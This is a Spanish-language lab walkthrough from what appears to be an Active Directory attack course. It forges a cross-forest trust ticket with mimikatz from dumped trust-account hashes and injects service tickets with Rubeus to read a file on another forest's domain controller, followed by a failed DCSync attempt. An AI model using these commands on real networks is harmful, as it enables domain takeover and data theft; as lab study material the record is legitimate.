Learning Objective - 20
Across Forest using Trust Tickets
Requerimos el hash de la confianza entre forest.
SMB 172.16.2.1 445 DCORP-DC mcorp$:1103:aad3b435b51404eeaad3b435b51404ee:f5b5c9f1ca76187393db1d3bb8ded94e:::
SMB 172.16.2.1 445 DCORP-DC US$:1104:aad3b435b51404eeaad3b435b51404ee:f85385d81cc4936d37ff8f27813f43c6:::
SMB 172.16.2.1 445 DCORP-DC ecorp$:1112:aad3b435b51404eeaad3b435b51404ee:4501e4c7f30e1cb3c9886f06a3ed1c6a:::Creando un TGT entre forest.
C:\AD\Tools>mimikatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4501e4c7f30e1cb3c9886f06a3ed1c6a /service:krbtgt /target:eurocorp.local /ticket:trust_forest_tkt.kirbi" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4501e4c7f30e1cb3c9886f06a3ed1c6a /service:krbtgt /target:eurocorp.local /ticket:trust_forest_tkt.kirbi
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 4501e4c7f30e1cb3c9886f06a3ed1c6a - rc4_hmac_nt
Service : krbtgt
Target : eurocorp.local
Lifetime : 3/4/2024 2:30:48 AM ; 3/2/2034 2:30:48 AM ; 3/2/2034 2:30:48 AM
-> Ticket : trust_forest_tkt.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
mimikatz(commandline) # exit
Bye!
Luego cargamos el ticket usando rubeus.
C:\AD\Tools>Rubeus.exe asktgs /ticket:trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/eurocorp-dc.eurocorp.local'
[*] Using domain controller: eurocorp-dc.eurocorp.local (172.16.15.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
doIFjjCCBYqgAwIBBaEDAgEWooIEcDCCBGxhggRoMIIEZKADAgEFoRAbDkVVUk9DT1JQLkxPQ0FMoi0w
K6ADAgECoSQwIhsEY2lmcxsaZXVyb2NvcnAtZGMuZXVyb2NvcnAubG9jYWyjggQaMIIEFqADAgESoQMC
AQqiggQIBIIEBAgZKzPmmUITcuwUbfM/uLcsByEwg/dMg8Y0vkQZux0opKlDvj08pvby44Q4Th16IKXZ
1xFXwcpgrSdps3RU498Y4bVonA3EswaEbAqFeofHr/8y7xQN/XmWHkVrAtiFPswkTLo653JwinVCKPso
cKJCS0GllF0jWj35vM+S3z1XJQf2ZtHcCa5FepYdSj/Xa5nGYikyhOrhCvWBMCaZ5GWlqEPURS7UUmKC
COaKC7eFq92gcKsGKfYk5BawabmrCpBZP+5h0PK1qmK0BeQkLIo2z9ajPMFi0ec7onCm/IyVh252I9P/
wh4GmJKcMyDoXZ4q11gVBVjKcttXbaGeYXNOwbUC4j7ucRb6F4oKabveqtoXkgDKSR4OwUhcAUCR11ir
jKn4rqhciYvkzcphaWyv8lpTbp2gmqGL4doURnmEYOL/djR/gXiWdgOdeeTH4j8N2RKY+c7N8wA9bFKd
mfN+WSfrNl+DBv8RTsr4sBlzkYDQhpcW2q6805pvR+1strtDPm6kM6xyIGeyvULp2FzsM9LX2Mj1sVtO
6Xz6SFUUxD/w4tZX7Ra43A0ESWJ+Eh9yAGRuAOCrXeh+5lFeYTsJXzd1BBMT73zUZ+tm9b8Rz7VXD65q
inFpJ9qTUzE48yq8c0gbYx6Nhy8Fg3bn6mezPFxS+t5pdACRA2l49/xlpaLlKpj8Mz+/myMT0533dGBo
pLNF6IkSg4NhptEcZwZJo7QVJK6+E66ZgcBX5BNHYjCeVnh+O2oAQycrbbhuOYHo/RUxhbXVPCKaB/Gn
pbsvImS3lbWxxI2KEhpWPtKihGZdpG3rU8q33nRpYRcQm+31kvInTRw1RrbT2m4SZb3oea7VGuOeTPBG
mgGfyeOQFMO0Jkuivaubk6sc8rCz9XHBFmgVwzw5RNp8K/YmqHlkKNHUrPhYmaWFNzKJLkZcoksxEsBv
8axwax7sxRTtTVX1FzoSQzJaFqu49D0ebq9c7Vqpk5KJip1Ti0YJ1FU57PSHQ30P7P5y7bIBqLDmmASm
7TGC69ehiDutDllQb71684+ucr7ly8qL62EmyBMYEz5Je+cen0dwPjOFDTvnlAlhBHQNAI/hlo3wNuTY
O22D8Jl0hKFPdBF2BK1Sg+CUgY3Qhoy8NDW0yAuG2D34gvHihbBp//ctps7P+BaBtShVIMwovvnSBU25
CoEQTy5ZOaTvWLlSAApT7gbU9IoS4+kl0k+y9lj+r6HHm/4W3YH0y+8emhkUajnRjQ8xuGmX5DPPwCoi
662DKgrGoU16Tcnviziois6d76DXuCD8VCJFcwJhopk+Dzr3NiBj+WgBYkVoXBguFjCPPBZIB3T8rKCO
WGpK8BiPI29JIzz5uRVf1gcNo4IBCDCCAQSgAwIBAKKB/ASB+X2B9jCB86CB8DCB7TCB6qArMCmgAwIB
EqEiBCCg2U90iALbhrC3P4FVBfXDOqB19ReLUqWmj/g5TO+F36EcGxpkb2xsYXJjb3JwLm1vbmV5Y29y
cC5sb2NhbKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEClAAClERgPMjAyNDAzMDQxMDMw
NTlaphEYDzIwMjQwMzA0MjAzMDU5WqcRGA8yMDI0MDMxMTEwMzA1OVqoEBsORVVST0NPUlAuTE9DQUyp
LTAroAMCAQKhJDAiGwRjaWZzGxpldXJvY29ycC1kYy5ldXJvY29ycC5sb2NhbA==
ServiceName : cifs/eurocorp-dc.eurocorp.local
ServiceRealm : EUROCORP.LOCAL
UserName : Administrator
UserRealm : dollarcorp.moneycorp.local
StartTime : 3/4/2024 2:30:59 AM
EndTime : 3/4/2024 12:30:59 PM
RenewTill : 3/11/2024 3:30:59 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : oNlPdIgC24awtz+BVQX1wzqgdfUXi1Klpo/4OUzvhd8=
Ahora podemos consultar al dc de eurocorp leer los archivos y obtener el contenido de secret.txt
C:\AD\Tools>dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\
Volume in drive \\eurocorp-dc.eurocorp.local\SharedwithDCorp has no label.
Volume Serial Number is 1A5A-FDE2
Directory of \\eurocorp-dc.eurocorp.local\SharedwithDCorp
11/16/2022 04:26 AM <DIR> .
11/15/2022 06:17 AM 29 secret.txt
1 File(s) 29 bytes
1 Dir(s) 12,755,787,776 bytes free
C:\AD\Tools>type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
Dollarcorp DAs can read this!
C:\AD\Tools>DCSync
Si quisieramos hacer DCSync, probamos con el protocolo LDAP al cargar el ticket.
C:\AD\Tools>Rubeus.exe asktgs /ticket:trust_forest_tkt.kirbi /service:ldap/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'ldap/eurocorp-dc.eurocorp.local'
[*] Using domain controller: eurocorp-dc.eurocorp.local (172.16.15.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
doIFjjCCBYqgAwIBBaEDAgEWooIEcDCCBGxhggRoMIIEZKADAgEFoRAbDkVVUk9DT1JQLkxPQ0FMoi0w
K6ADAgECoSQwIhsEbGRhcBsaZXVyb2NvcnAtZGMuZXVyb2NvcnAubG9jYWyjggQaMIIEFqADAgESoQMC
AQqiggQIBIIEBI9+WG8cz1LDuX8Dk9+tlOaTLDPbon/rmZj+Gh3OEwsdMfTkmuE1N8v7avq3Wja+NLEk
Jfr6ZwMQbTVqPxyL4EuEhS44ga8Ni3K7BxUp1JYfvwPvvoB7OR6vOVXRO04m2JRcthfz4sEzvMQH3PnG
zU12MQ+R6zGAjd8/urJj0Ip1F0Y9+P83NuLSY72y+ISGkadwmxoYC9AhocgyyJWp/w8b90vKnDhgC2bJ
zlLM4m5Fy69m3vgAG0hBXuo5ArhN4MQvihP9wteiIFtT47dsl4jf6b/Eo5meh37defKVC20pyr7DsLVl
PJBuyuvFPJWeK/ZIMJHYSczokdtHLnL0e+fkySHSzQqmDaFhaGPdqtLqp3jv1RP2k6bcGTO79JOmqB/q
RqggAqUP2Rt2VML1w94mDZLCWZaCwnLifsurw8e8FNotFBdpZBPHCfhtzoXRjNt7i1bn/nJKbMTU+DAI
bT42cT9MGVX+5MQQ+VtRJbXf9FMSRJnfmwl7JTxnS2qnMpsxGQE7o5RK50K/99tOuLSead866DjUTUXq
OIRgPVDdPyvZ+6HK6Xsgg9mPD5sfnZ/HOpcCdwQuJa1UVAQk93NqjCSP+TwKF5EjqWpBVCvpYyGHPlQU
jAFg7Gi1lc2qMOdWvEzGUMOmo4gyE0soO9PZxDSQ/merbStvd3T2PqtcdVVrch0vihvh6lm+ea90ZtM1
J7b3RGuhtpUUgrpRPA7/hwIcvuvg1N2wpRHeyW8Lwz307NMNJkHky+IVdc/5qZowhSEbIEIDbmv8oOqg
uLBA5ObrJz5tL1nS6+eSDo04XIJf3Yu73s7vXWTsZNvYdc8gFj/reahweFw1Gp2kxfdM5vCGAPmwuOAb
FpLfeRyRpPy6xagX8y6KNBQZpeAGfYl8ubwTlPGIhBx48BomBW0mpEWJsQjp6Ch9sBjtwcyzDjH7oUxC
ZwLg4WduCj06uRaZN08w/Stw0SrxRiyNXc1vMY8ulIZ6VhenNcA4U23RrES2n6KJ7vCOeI2sgepZIq3j
5PvDXEid0i5jqZVMCuZTwoIczpLkmdb8jAg7wZtbsp7NNU7cWzyN4dyVYt1VARjNwbt7DyTB5vIi+apn
DL/2Dx7jgT0qDQjWkq7A+/Kl3DitdgoAhZAVfuIyOjd38l2eGwqDB+F6OD/sOSICWRW9lCa1MOhiAX94
S0qksn+2w/7FOXUsNd/zly6txwq5+hfrShdPyLQNEkMP2855P+Hq0bEXq42ErbEApZrz3D0WdtLUsdcr
N4myuI7jJj1ri6wQCmqW+txcLXtjHd05BmxgEjn9A+sSlchAehgDI56WdqjiXiRiLp1YnSmOe/J+wmxz
/l5PkiIi+OBnJNh7r5JPf+W7o4IBCDCCAQSgAwIBAKKB/ASB+X2B9jCB86CB8DCB7TCB6qArMCmgAwIB
EqEiBCDtFchaQ8cyWXbOz3e/8VJ8myX+ft8Yd5NVvzV0vyITL6EcGxpkb2xsYXJjb3JwLm1vbmV5Y29y
cC5sb2NhbKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEClAAClERgPMjAyNDAzMDQxMDM3
MjhaphEYDzIwMjQwMzA0MjAzNzI4WqcRGA8yMDI0MDMxMTEwMzcyOFqoEBsORVVST0NPUlAuTE9DQUyp
LTAroAMCAQKhJDAiGwRsZGFwGxpldXJvY29ycC1kYy5ldXJvY29ycC5sb2NhbA==
ServiceName : ldap/eurocorp-dc.eurocorp.local
ServiceRealm : EUROCORP.LOCAL
UserName : Administrator
UserRealm : dollarcorp.moneycorp.local
StartTime : 3/4/2024 2:37:28 AM
EndTime : 3/4/2024 12:37:28 PM
RenewTill : 3/11/2024 3:37:28 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 7RXIWkPHMll2zs93v/FSfJsl/n7fGHeTVb81dL8iEy8=
No funciona y no se porque exactamente, debe estar limitado a ciertas consultas.
C:\AD\Tools>mimikatz.exe "lsadump::dcsync /user:ecorp\Administrator /domain:eurocorp.local" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /user:ecorp\Administrator /domain:eurocorp.local
[DC] 'eurocorp.local' will be the domain
[DC] 'eurocorp-dc.eurocorp.local' will be the DC server
[DC] 'ecorp\Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
mimikatz(commandline) # exit
Bye!
C:\AD\Tools>Last updated